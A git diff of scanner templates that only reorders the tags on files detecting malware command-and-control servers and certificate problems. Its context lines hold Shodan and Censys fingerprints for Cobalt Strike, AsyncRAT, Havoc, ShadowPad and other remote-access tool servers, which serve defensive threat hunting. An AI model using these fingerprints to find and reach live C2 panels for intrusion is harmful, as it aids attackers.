a/ssl/c2/asyncrat-c2.yaml b/ssl/c2/asyncrat-c2.yaml index f4f69d6da7..279c9438da 100644 --- a/ssl/c2/asyncrat-c2.yaml +++ b/ssl/c2/asyncrat-c2.yaml @@ -13,7 +13,7 @@ info: max-request: 1 shodan-query: ssl:"AsyncRAT Server" censys-query: services.tls.certificates.leaf_data.issuer.common_name:AsyncRat - tags: c2,ir,osint,malware,ssl,asyncrat + tags: c2,ssl,tls,ir,osint,malware,asyncrat ssl: - address: "{{Host}}:{{Port}}" matchers: diff --git a/ssl/c2/bitrat-c2.yaml b/ssl/c2/bitrat-c2.yaml index 99d1e31b67..dff181170e 100644 --- a/ssl/c2/bitrat-c2.yaml +++ b/ssl/c2/bitrat-c2.yaml @@ -12,7 +12,7 @@ info: verified: "true" max-request: 1 censys-query: 'services.tls.certificates.leaf_data.subject.common_name: "BitRAT"' - tags: c2,ir,osint,malware,ssl,bitrat + tags: ssl,tls,c2,ir,osint,malware,bitrat ssl: - address: "{{Host}}:{{Port}}" matchers: diff --git a/ssl/c2/cobalt-strike-c2.yaml b/ssl/c2/cobalt-strike-c2.yaml index ed9eb883e9..db0c3058a1 100644 --- a/ssl/c2/cobalt-strike-c2.yaml +++ b/ssl/c2/cobalt-strike-c2.yaml @@ -12,7 +12,7 @@ info: verified: "true" max-request: 1 shodan-query: ssl.cert.serial:146473198 - tags: c2,ir,osint,malware,ssl,panel,cobalt-strike + tags: c2,ssl,tls,ir,osint,malware,panel,cobalt-strike ssl: - address: "{{Host}}:{{Port}}" matchers: diff --git a/ssl/c2/covenant-c2-ssl.yaml b/ssl/c2/covenant-c2-ssl.yaml index ee4e084614..ae4ea7abb6 100644 --- a/ssl/c2/covenant-c2-ssl.yaml +++ b/ssl/c2/covenant-c2-ssl.yaml @@ -12,7 +12,7 @@ info: verified: "true" max-request: 1 shodan-query: ssl:”Covenant” http.component:”Blazor” - tags: c2,ir,osint,malware,ssl,covenant + tags: ssl,tls,c2,ir,osint,malware,covenant ssl: - address: "{{Host}}:{{Port}}" matchers: diff --git a/ssl/c2/dcrat-server-c2.yaml b/ssl/c2/dcrat-server-c2.yaml index 00b270de48..aa0e3a912e 100644 --- a/ssl/c2/dcrat-server-c2.yaml +++ b/ssl/c2/dcrat-server-c2.yaml @@ -12,7 +12,7 @@ info: verified: "true" max-request: 1 censys-query: 'services.tls.certificates.leaf_data.subject.common_name: "DcRat Server"' - tags: c2,ir,osint,malware,ssl,dcrat + tags: c2,ssl,tls,ir,osint,malware,dcrat ssl: - address: "{{Host}}:{{Port}}" matchers: diff --git a/ssl/c2/gozi-malware-c2.yaml b/ssl/c2/gozi-malware-c2.yaml index 6a1128857d..517dfd685c 100644 --- a/ssl/c2/gozi-malware-c2.yaml +++ b/ssl/c2/gozi-malware-c2.yaml @@ -12,7 +12,7 @@ info: verified: "true" max-request: 1 censys-query: 'services.tls.certificates.leaf_data.issuer_dn: "C=XX, ST=1, L=1, O=1, OU=1, CN=\*"' - tags: c2,ir,osint,malware,ssl,gozi + tags: ssl,tls,c2,ir,osint,malware,gozi ssl: - address: "{{Host}}:{{Port}}" matchers: diff --git a/ssl/c2/havoc-c2.yaml b/ssl/c2/havoc-c2.yaml index 384ea4386b..5b67d7e3af 100644 --- a/ssl/c2/havoc-c2.yaml +++ b/ssl/c2/havoc-c2.yaml @@ -13,7 +13,7 @@ info: verified: "true" max-request: 1 shodan-query: 'ssl:postalCode=3540 ssl.jarm:3fd21b20d00000021c43d21b21b43de0a012c76cf078b8d06f4620c2286f5e' - tags: c2,ir,osint,malware,ssl,havoc + tags: c2,ssl,tls,ir,osint,malware,havoc ssl: - address: "{{Host}}:{{Port}}" matchers: diff --git a/ssl/c2/icedid.yaml b/ssl/c2/icedid.yaml index 5a2aa2c659..ef95089362 100644 --- a/ssl/c2/icedid.yaml +++ b/ssl/c2/icedid.yaml @@ -10,7 +10,7 @@ info: verified: "true" max-request: 1 censys-query: CN=localhost, C=AU, ST=Some-State, O=Internet Widgits Pty Ltd - tags: c2,ir,osint,malware,ssl,bokbot,icedid + tags: c2,ssl,tls,ir,osint,malware,bokbot,icedid ssl: - address: "{{Host}}:{{Port}}" matchers: diff --git a/ssl/c2/metasploit-c2.yaml b/ssl/c2/metasploit-c2.yaml index 84ac1cd8a4..d3572b1a57 100644 --- a/ssl/c2/metasploit-c2.yaml +++ b/ssl/c2/metasploit-c2.yaml @@ -12,7 +12,7 @@ info: verified: "true" max-request: 1 shodan-query: ssl:"MetasploitSelfSignedCA" - tags: c2,ir,osint,malware,ssl,metasploit + tags: c2,ssl,tls,ir,osint,malware,metasploit ssl: - address: "{{Host}}:{{Port}}" matchers: diff --git a/ssl/c2/mythic-c2-ssl.yaml b/ssl/c2/mythic-c2-ssl.yaml index cc00f613b4..9170d899ec 100644 --- a/ssl/c2/mythic-c2-ssl.yaml +++ b/ssl/c2/mythic-c2-ssl.yaml @@ -14,7 +14,7 @@ info: max-request: 1 shodan-query: ssl:"Mythic" censys-query: services.tls.certificates.leaf_data.issuer.common_name:Mythic - tags: c2,ir,osint,malware,ssl,mythic + tags: c2,ssl,tls,ir,osint,malware,mythic ssl: - address: "{{Host}}:{{Port}}" matchers: diff --git a/ssl/c2/orcus-rat-c2.yaml b/ssl/c2/orcus-rat-c2.yaml index 0e3f59a8e1..3a39bbf9a2 100644 --- a/ssl/c2/orcus-rat-c2.yaml +++ b/ssl/c2/orcus-rat-c2.yaml @@ -12,7 +12,7 @@ info: verified: "true" max-request: 1 censys-query: 'services.tls.certificates.leaf_data.subject.common_name: {"Orcus Server", "OrcusServerCertificate"}' - tags: c2,ir,osint,malware,ssl,orcusrat + tags: c2,ssl,tls,ir,osint,malware,orcusrat ssl: - address: "{{Host}}:{{Port}}" matchers: diff --git a/ssl/c2/posh-c2.yaml b/ssl/c2/posh-c2.yaml index 0059135a6b..fc3a45ae0a 100644 --- a/ssl/c2/posh-c2.yaml +++ b/ssl/c2/posh-c2.yaml @@ -13,7 +13,7 @@ info: verified: "true" max-request: 1 shodan-query: ssl:"P18055077" - tags: c2,ir,osint,malware,ssl,posh + tags: c2,ssl,tls,ir,osint,malware,posh ssl: - address: "{{Host}}:{{Port}}" matchers: diff --git a/ssl/c2/quasar-rat-c2.yaml b/ssl/c2/quasar-rat-c2.yaml index bb66912c78..d0ee75f19a 100644 --- a/ssl/c2/quasar-rat-c2.yaml +++ b/ssl/c2/quasar-rat-c2.yaml @@ -13,7 +13,7 @@ info: max-request: 1 shodan-query: ssl.cert.subject.cn:"Quasar Server CA" censys-query: 'services.tls.certificates.leaf_data.subject.common_name: {"Quasar Server CA"}' - tags: c2,ir,osint,malware,ssl,quasar + tags: c2,ssl,tls,ir,osint,malware,quasar ssl: - address: "{{Host}}:{{Port}}" matchers: diff --git a/ssl/c2/shadowpad-c2.yaml b/ssl/c2/shadowpad-c2.yaml index 6179af7257..fc588e28dd 100644 --- a/ssl/c2/shadowpad-c2.yaml +++ b/ssl/c2/shadowpad-c2.yaml @@ -10,7 +10,7 @@ info: verified: "true" max-request: 1 censys-query: services.tls.certificates.leaf_data.subject_dn="C=CN, ST=myprovince, L=mycity, O=myorganization, OU=mygroup, CN=myServer" - tags: c2,ir,osint,malware,ssl,shadowpad + tags: ssl,tls,c2,ir,osint,malware,shadowpad ssl: - address: "{{Host}}:{{Port}}" matchers: diff --git a/ssl/kubernetes-fake-certificate.yaml b/ssl/kubernetes-fake-certificate.yaml index 67a53a0239..ba1852d8d3 100644 --- a/ssl/kubernetes-fake-certificate.yaml +++ b/ssl/kubernetes-fake-certificate.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: ssl:"Kubernetes Ingress Controller Fake Certificate" - tags: ssl,kubernetes,tls,self-signed + tags: ssl,tls,kubernetes,self-signed ssl: - address: "{{Host}}:{{Port}}" matchers: diff --git a/ssl/mismatched-ssl-certificate.yaml b/ssl/mismatched-ssl-certificate.yaml index 0dce473aca..ee57b6be51 100644 --- a/ssl/mismatched-ssl-certificate.yaml +++ b/ssl/mismatched-ssl-certificate.yaml @@ -10,7 +10,7 @@ info: - https://www.invicti.com/web-vulnerability-scanner/vulnerabilities/ssl-certificate-name-hostname-mismatch/ metadata: max-request: 1 - tags: ssl,mismatched,tls + tags: ssl,tls,mismatched ssl: - address: "{{Host}}:{{Port}}" matchers: diff --git a/ssl/revoked-ssl-certificate.yaml b/ssl/revoked-ssl-certificate.yaml index 850aa10a4e..fa18112b74 100644 --- a/ssl/revoked-ssl-certificate.yaml +++ b/ssl/revoked-ssl-certificate.yaml @@ -11,7 +11,7 @@ info: - https://www.tenable.com/plugins/nnm/5837 metadata: max-request: 1 - tags: ssl,revoked,tls + tags: ssl,tls,revoked ssl: - address: "{{Host}}:{{Port}}" matchers: diff --git a/ssl/untrusted-root-certificate.yaml b/ssl/untrusted-root-certificate.yaml index db88d747d4..91ab7ecc5a 100644 --- a/ssl/untrusted-root-certificate.yaml +++ b/ssl/untrusted-root-certificate.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true max-request: 1 - tags: ssl,untrusted,tls + tags: ssl,tls,untrusted ssl: - address: "{{Host}}:{{Port}}" matchers: diff --git a/ssl/wildcard-tls.yaml b/ssl/wildcard-tls.yaml index c63467714d..c3b9c7acff 100644 --- a/ssl/wildcard-tls.yaml +++ b/ssl/wildcard-tls.yaml @@ -10,7 +10,7 @@ info: - https://cheatsheetseries.owasp.org/cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#carefully-consider-the-use-of-wildcard-certificates metadata: max-request: 1 - tags: ssl,wildcard,tls + tags: ssl,tls,wildcard ssl: - address: "{{Host}}:{{Port}}" matchers: